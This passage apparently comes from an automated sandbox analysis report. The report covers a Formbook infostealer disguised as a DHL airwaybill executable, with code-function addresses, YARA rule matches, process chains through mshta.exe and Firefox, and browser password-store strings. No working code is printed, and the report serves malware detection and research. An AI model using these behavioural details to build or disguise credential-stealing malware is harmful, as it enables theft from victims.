            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0345BE655_2_0345BE65
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_03443AD55_2_03443AD5
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_03443AD25_2_03443AD2
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_03443A8E5_2_03443A8E
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0343D1655_2_0343D165
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0343D1645_2_0343D164
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0343B4055_2_0343B405
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_034458E95_2_034458E9
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05FA84C05_2_05FA84C0
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F897C05_2_05F897C0
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F897BF5_2_05F897BF
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F91F505_2_05F91F50
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F899E05_2_05F899E0
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F901305_2_05F90130
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F9012D5_2_05F9012D
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F900E95_2_05F900E9
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F8E8B05_2_05F8E8B0
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F87A605_2_05F87A60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F202C06_2_02F202C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F402746_2_02F40274
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F603E66_2_02F603E6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EAE3F06_2_02EAE3F0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5A3526_2_02F5A352
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E6A33D6_2_02E6A33D
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F320006_2_02F32000
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F581CC6_2_02F581CC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F541A26_2_02F541A2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F601AA6_2_02F601AA
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F281586_2_02F28158
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E6A1356_2_02E6A135
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E901006_2_02E90100
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F3A1186_2_02F3A118
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EBC6E06_2_02EBC6E0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E9C7C06_2_02E9C7C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA07706_2_02EA0770
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EC47506_2_02EC4750
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F4E4F66_2_02F4E4F6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F524466_2_02F52446
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F444206_2_02F44420
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F605916_2_02F60591
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E6A5456_2_02E6A545
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA05356_2_02EA0535
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E9EA806_2_02E9EA80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F56BD76_2_02F56BD7
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5AB406_2_02F5AB40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ECE8F06_2_02ECE8F0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E868B86_2_02E868B8
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA28406_2_02EA2840
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EAA8406_2_02EAA840
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA29A06_2_02EA29A0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F6A9A66_2_02F6A9A6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EB69626_2_02EB6962
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5EEDB6_2_02F5EEDB
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5CE936_2_02F5CE93
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EB2E906_2_02EB2E90
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA0E596_2_02EA0E59
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5EE266_2_02F5EE26
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EACFE06_2_02EACFE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E92FC86_2_02E92FC8
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F1EFA06_2_02F1EFA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F14F406_2_02F14F40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F42F306_2_02F42F30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EE2F286_2_02EE2F28
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EC0F306_2_02EC0F30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E90CF26_2_02E90CF2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F40CB56_2_02F40CB5
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA0C006_2_02EA0C00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E9ADE06_2_02E9ADE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EB8DBF6_2_02EB8DBF
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EAAD006_2_02EAAD00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F3CD1F6_2_02F3CD1F
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F412ED6_2_02F412ED
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EBB2C06_2_02EBB2C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA52A06_2_02EA52A0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EE739A6_2_02EE739A
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E8D34C6_2_02E8D34C
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5132D6_2_02F5132D
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5F0E06_2_02F5F0E0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F570E96_2_02F570E9
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA70C06_2_02EA70C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F4F0CC6_2_02F4F0CC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EAB1B06_2_02EAB1B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED516C6_2_02ED516C
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E8F1726_2_02E8F172
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F6B16B6_2_02F6B16B
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F516CC6_2_02F516CC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EE56306_2_02EE5630
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5F7B06_2_02F5F7B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E914606_2_02E91460
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5F43F6_2_02F5F43F
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F695C36_2_02F695C3
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F3D5B06_2_02F3D5B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F575716_2_02F57571
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F4DAC66_2_02F4DAC6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EE5AA06_2_02EE5AA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F41AA36_2_02F41AA3
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F3DAAC6_2_02F3DAAC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F13A6C6_2_02F13A6C
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F57A466_2_02F57A46
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5FA496_2_02F5FA49
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F15BF06_2_02F15BF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EDDBF96_2_02EDDBF9
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EBFB806_2_02EBFB80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5FB766_2_02F5FB76
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA38E06_2_02EA38E0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F0D8006_2_02F0D800
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA99506_2_02EA9950
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EBB9506_2_02EBB950
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F359106_2_02F35910
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA9EB06_2_02EA9EB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E63FD56_2_02E63FD5
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E63FD26_2_02E63FD2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5FFB16_2_02F5FFB1
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA1F926_2_02EA1F92
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5FF096_2_02F5FF09
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5FCF26_2_02F5FCF2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F19C326_2_02F19C32
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EBFDC06_2_02EBFDC0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F57D736_2_02F57D73
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA3D406_2_02EA3D40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F51D5A6_2_02F51D5A
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_005319106_2_00531910
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0052C81F6_2_0052C81F
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0052C8206_2_0052C820
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0052CA406_2_0052CA40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0052AAC06_2_0052AAC0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00534FB06_2_00534FB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_005331496_2_00533149
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_005331906_2_00533190
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0053318D6_2_0053318D
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0054B5206_2_0054B520
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_031B019D6_2_031B019D
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_031BD8E86_2_031BD8E8
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: String function: 01AFB970 appears 280 times
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: String function: 01B8F290 appears 105 times
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: String function: 01B7EA12 appears 86 times
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: String function: 01B45130 appears 58 times
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: String function: 01B57E54 appears 111 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 02F1F290 appears 105 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 02ED5130 appears 58 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 02F0EA12 appears 86 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 02E8B970 appears 280 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 02EE7E54 appears 111 times
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2158301381.0000000008550000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2155275562.00000000037E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2153050073.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2154287854.00000000027E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000000.2132774257.0000000000380000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZYkF.exe* vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2157386914.00000000069F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2154287854.0000000002830000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001518000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSHTA.EXED vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381826994.0000000001BFD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSHTA.EXED vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeBinary or memory string: OriginalFilenameZYkF.exe* vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, emu8FuFpCfwR9JjoYE.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, emu8FuFpCfwR9JjoYE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, emu8FuFpCfwR9JjoYE.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, s8uyooQ3ZFuJisHEdm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, s8uyooQ3ZFuJisHEdm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, emu8FuFpCfwR9JjoYE.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, emu8FuFpCfwR9JjoYE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, emu8FuFpCfwR9JjoYE.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, s8uyooQ3ZFuJisHEdm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, emu8FuFpCfwR9JjoYE.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, emu8FuFpCfwR9JjoYE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, emu8FuFpCfwR9JjoYE.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/12
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL airwaybill # 6913321715 & BL Draft copy.exe.logJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Temp\14_8-J-J8Jump to behavior
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: mshta.exe, 00000006.00000002.4603364432.00000000026D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4603364432.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2555939338.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2558528874.00000000026B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2555756474.0000000002688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeReversingLabs: Detection: 60%
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeVirustotal: Detection: 53%
            Source: unknownProcess created: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe"
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess created: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe"
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
